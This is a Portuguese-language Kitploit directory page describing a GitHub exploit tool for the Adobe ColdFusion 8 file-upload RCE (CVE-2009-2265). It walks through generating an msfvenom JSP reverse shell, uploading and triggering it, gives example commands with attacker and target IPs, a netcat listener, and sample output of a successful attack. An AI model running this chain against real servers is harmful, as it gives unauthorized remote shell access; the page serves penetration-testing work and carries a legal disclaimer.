Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - Execução Remota de Comandos (RCE)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 1 anoAinda não revisado

Adobe ColdFusion 8 - Exploração de Execução Remota de Comandos (RCE)

Visão Geral

Este exploit visa uma vulnerabilidade conhecida no Adobe ColdFusion 8 (CVE-2009-2265). Ele permite a execução remota de comandos (RCE) ao carregar um payload JSP malicioso que estabelece uma conexão de reverse shell.


Detalhes do Exploit

  • CVE: CVE-2009-2265
  • Vulnerabilidade: Manipulação inadequada de uploads de arquivos no Adobe ColdFusion 8.
  • Versões Afetadas: Adobe ColdFusion 8.
  • Impacto: Permite que atacantes executem comandos arbitrários no servidor.

Funcionalidades

  1. Gera automaticamente um payload JSP usando msfvenom.
  2. Carrega o payload usando uma requisição POST multipart.
  3. Aciona o payload para estabelecer um reverse shell.
  4. Remove automaticamente os arquivos locais do payload após a execução.

Uso

Para usar este exploit, você precisa do seguinte:

  • Uma máquina Kali Linux ou um ambiente de teste de penetração similar.
  • Netcat instalado para escutar na porta especificada.
  • Um servidor Adobe ColdFusion 8 vulnerável.

Sintaxe do Comando

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

Argumentos

  • -l <LHOST>: IP do atacante local (ex., 10.10.16.5).
  • -p <LPORT>: Porta local do atacante para o reverse shell (ex., 9001).
  • -r <RHOST>: IP do alvo remoto (ex., 10.10.10.11).
  • -q <RPORT>: Porta remota do alvo onde o ColdFusion está rodando (ex., 8500).

Exemplo de Uso

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. Inicie um listener na sua máquina atacante:

    root@kitploit:~
    nc -lnvp 9001
    
  2. Execute o exploit com os argumentos apropriados.

  3. Uma vez executado, o payload se conectará de volta ao seu listener.


Como Funciona

  1. Gerar Payload:

    • O script usa msfvenom para gerar um payload JSP malicioso.
    • O payload inicia um reverse shell para o LHOST e LPORT especificados.
  2. Carregar Payload:

    • O payload é enviado para o servidor ColdFusion vulnerável usando uma requisição POST.
  3. Acionar Payload:

    • O payload carregado é executado ao enviar uma requisição GET para a URL do arquivo.
  4. Estabelecer Reverse Shell:

    • Um reverse shell é estabelecido, dando ao atacante acesso ao sistema alvo.

Requisitos

  • msfvenom para geração do payload.
  • curl para upload e acionamento do payload.
  • nc (Netcat) para escutar conexões de reverse shell.

Exemplo de Saída

root@kitploit:~
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!

Aviso Legal

Este script é apenas para fins educacionais. Use-o em sistemas próprios ou com permissão explícita para testar. O uso não autorizado deste exploit em sistemas que não são seus é ilegal e antiético.


Autor

Desenvolvido por [0xDTC].

Baixar ferramenta